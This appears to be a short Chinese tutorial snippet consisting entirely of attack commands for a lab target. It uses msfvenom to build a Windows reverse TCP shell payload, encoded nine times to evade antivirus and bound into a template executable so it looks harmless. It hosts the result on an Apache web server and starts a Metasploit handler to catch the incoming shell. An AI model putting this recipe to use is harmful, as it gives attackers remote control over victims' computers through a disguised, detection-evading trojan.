1:msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.35.4 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f exe -o /root/lol.exe -x LOL.exe
2:cp lol.exe /var/www/html
3:service apache2 start
4:msfconsole
5:use exploit/multi/handler
6:set payload windows/shell/reverse_tcp
7:set LHOST 172.16.35.4
8:set LPORT 4444
9:exploit
10:然后打开靶机
网友评论